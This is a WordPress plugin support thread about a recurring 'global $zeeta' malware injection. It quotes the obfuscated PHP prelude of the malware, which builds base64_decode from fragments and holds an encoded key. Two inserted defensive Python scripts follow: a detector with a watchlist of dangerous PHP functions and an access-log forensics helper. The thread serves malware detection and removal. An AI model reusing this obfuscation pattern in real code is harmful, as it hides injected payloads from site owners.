Support » Plugin: Anti-Malware Security and Brute-Force Firewall » global $zeeta; not being found by gotmls

  • Resolved ontheroad

    (@ontheroad)


    Hello

    I ran GOTMLS and it found several files which have been quarantined which is great. However, the malware kept coming back.

    It’s the typical pop-up-when-clicking-a-link malware – rogue ads.

    I searched through the site, which you can find here, and located the following code in Functions:

    global $zeeta;
    if (!$npDcheckClassBgp && !isset($zeeta)) {

    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK0ubQgN4pBWZv2dPRfXN70cmCWIX7HVoQ==";

    There’s more code, which I can email if you want.

    I’m wondering if GOTMLS can be updated to help remove this global $zeeta issue?

    • This topic was modified 1 month, 2 weeks ago by ontheroad.
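    The snippet above never spells out the function it is about to call; it assembles the name from fragments with str_replace and string concatenation, which is why a plain text search for the usual names finds nothing. As an added example (not code from this post or from the GOTMLS plugin), here is a small Python script that folds those string-building statements the way PHP would and reports any variable that ends up holding a function name from a watchlist. The sample PHP is the prelude quoted in the post, re-typed with straight quotes and with the encoded payload omitted; the watchlist of function names is my own assumption.

```python
import re

# Constructed sample: the variable-building prelude quoted in the post,
# re-typed with straight quotes and with the encoded payload omitted.
SAMPLE_PHP = r"""
global $zeeta;
if (!$npDcheckClassBgp && !isset($zeeta)) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd';
$ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default';
"""

# Assumed watchlist: function names that obfuscated droppers commonly
# assemble at runtime so that a plain text search never sees them.
WATCHLIST = {"base64_decode", "eval", "gzinflate", "gzuncompress",
             "str_rot13", "create_function", "assert"}

VAR = r"\$(\w+)"
LIT = r"'([^']*)'"
ASSIGN_LIT = re.compile(rf"{VAR}\s*=\s*{LIT}\s*;")
ASSIGN_REPLACE = re.compile(
    rf"{VAR}\s*=\s*str_replace\(\s*{LIT}\s*,\s*{LIT}\s*,\s*{VAR}\s*\)\s*;")
ASSIGN_CONCAT = re.compile(rf"{VAR}\s*=\s*{VAR}\s*\.\s*{VAR}\s*;")


def fold_strings(php: str) -> dict:
    """Evaluate literal, str_replace() and '.' assignments in source order
    and return the final value of every string variable seen."""
    env = {}
    for chunk in re.finditer(r"[^;]*;", php):
        stmt = chunk.group(0)
        if m := ASSIGN_REPLACE.search(stmt):
            target, search, repl, src = m.groups()
            if src in env:
                env[target] = env[src].replace(search, repl)
        elif m := ASSIGN_CONCAT.search(stmt):
            target, left, right = m.groups()
            if left in env and right in env:
                env[target] = env[left] + env[right]
        elif m := ASSIGN_LIT.search(stmt):
            target, value = m.groups()
            env[target] = value
    return env


def find_hidden_calls(php: str) -> list:
    """Variables whose folded value is a watchlisted function name."""
    env = fold_strings(php)
    return sorted((name, val) for name, val in env.items() if val in WATCHLIST)


def has_zeeta_marker(php: str) -> bool:
    """The 'global $zeeta;' guard that marks this particular infection."""
    return re.search(r"global\s+\$zeeta\s*;", php) is not None


if __name__ == "__main__":
    print(find_hidden_calls(SAMPLE_PHP))   # [('oa', 'base64_decode')]
    print(has_zeeta_marker(SAMPLE_PHP))    # True
```

    Running it on the sample shows $oa resolving to base64_decode, which is the name the fragments '_shaesx_', 'decode', 'bas' and '64' were hiding. The folder only understands three statement shapes, so a variant that builds names some other way will need another rule; the point is to match on what the code computes rather than on the literal text.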
Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Author Eli

    (@scheeeli)

    I’ve seen code like that sample that you post and my plugin should remove it automatically, but I would need to see the whole file to be sure that this is still the same threat. If you can please email me the entire contents of that file then I will check it and add this new variant to my malware definitions if it has changed.

    eli AT gotmls DOT net

    Hi Eli,

    Thank you for the prompt reply. I’ve just emailed you the full Functions code. I’m also happy to help if you need more information. There are .bt files with ip addresses left by this virus too.

    I’ll be happy to make a donation if your plugin is able to remove this malicious code!

    Thank you.

    Plugin Author Eli

    (@scheeeli)

    Just following up here to thank you for the full code that you emailed me. This was basically the same threat that I had seen before and already had in my malware definitions, but whereas I had only ever seen it by itself in an entirely malicious file in the past, this was injected right into your existing PHP code. So I released a new definition update that will remove this new variant for you (without removing or damaging the existing PHP code that is supposed to be there ; – )

    Please download the latest definition updates and run the complete scan again. I don’t think I need to see those IP Address lists but please let me know if you find anything else I should look at.

    No problem Eli, and thank you for updating the definitions.

    I’m currently monitoring. Your update removed the infected file, but within a few hours the site was infected again. I’m watching the site logs to see where the infection is coming from and to try and nail it down.

    In the meantime, do you recommend any of these security plugins? e.g. iThemes Security etc. Or would it be better to use your firewall?

    Plugin Author Eli

    (@scheeeli)

    If you are working to prevent or contain an active threat then I would say: the more security, the better. While many firewalls are very similar in function and might overlap on some of the same protection, there is enough variance that it can sometimes be helpful to double up on your protection. The only thing you have to watch out for is overzealous firewalls that might end up locking you out of your own site 😉

    Some firewall plugins might also block the operation of other security plugins. I think we all try not to step on each other’s toes but it’s a delicate balance when your job is to scrutinize suspicious activity on the site.

    Don’t be afraid to try out other plugins but look at the reviews and look for plugins that are well supported so that you can get help if you get in over your head.

    As for tracking down the source of this recurring threat, your biggest forensic clues are the timestamps on the maliciously modified files. Look in the Anti-Malware Quarantine for the Infection Times of the latest infections (these are represented in GMT) and then cross-reference these times with the activity in your access_log files.

    • This reply was modified 1 month, 1 week ago by Eli.
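    The cross-referencing Eli describes is easy to get wrong by hand because the Quarantine times are GMT while access_log timestamps carry whatever offset the web server was configured with. As an added example (not code from the thread or from the GOTMLS plugin), the Python below parses combined-format access_log lines, normalises every timestamp to UTC, keeps the requests that landed in the minutes leading up to each infection time, and ranks the clients that sent POST requests in that window. The log lines and the infection time are constructed for the example, and the "YYYY-MM-DD HH:MM:SS" display format assumed for a Quarantine Infection Time is my assumption; adjust parse_infection_time to whatever your Quarantine page actually shows.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format; only the fields needed here are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed log lines (documentation-range IPs), not taken from the thread.
# Note the second line is written with a -0500 offset: it is 03:12:30 GMT.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Mar/2024:22:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [11/Mar/2024:22:12:30 -0500] "POST /xmlrpc.php HTTP/1.1" 200 340 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:03:14:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2024:03:15:40 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:03:16:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 98 "-" "Mozilla/5.0"',
    'this line is not in combined format and must be skipped',
]

# Constructed Infection Time; the page says Quarantine times are GMT.
SAMPLE_INFECTION = "2024-03-12 03:17:00"


def parse_infection_time(text: str) -> datetime:
    """Assumed 'YYYY-MM-DD HH:MM:SS' display format, interpreted as GMT/UTC."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def parse_log_line(line: str):
    """One combined-format line -> dict with a UTC-normalised time, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # The server may log in local time; convert using the offset it wrote.
    when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    return {"ip": m["ip"], "time": when, "method": m["method"],
            "path": m["path"], "status": int(m["status"])}


def requests_before(log_lines, infection_times, window=timedelta(minutes=10)):
    """Requests that arrived inside the window leading up to any infection time."""
    hits = []
    for line in log_lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        for t in infection_times:
            if t - window <= rec["time"] <= t:
                hits.append({**rec, "infection": t})
                break
    return sorted(hits, key=lambda r: r["time"])


def rank_writers(hits):
    """Clients that sent POST requests in the window, most active first;
    a file write usually rides on a POST rather than a GET."""
    return Counter(h["ip"] for h in hits if h["method"] == "POST").most_common()


if __name__ == "__main__":
    hits = requests_before(SAMPLE_LOG, [parse_infection_time(SAMPLE_INFECTION)])
    for h in hits:
        print(h["time"].isoformat(), h["ip"], h["method"], h["path"])
    print(rank_writers(hits))   # [('203.0.113.7', 2), ('192.0.2.5', 1)]
```

    On the constructed data the 22:00 GMT login from the previous evening falls outside the window and drops out, while the -0500 xmlrpc.php request is correctly pulled in once converted to GMT. Whichever client tops the ranking is the one whose other requests in the log deserve a close look, and the path it hit is the entry point to patch or restrict.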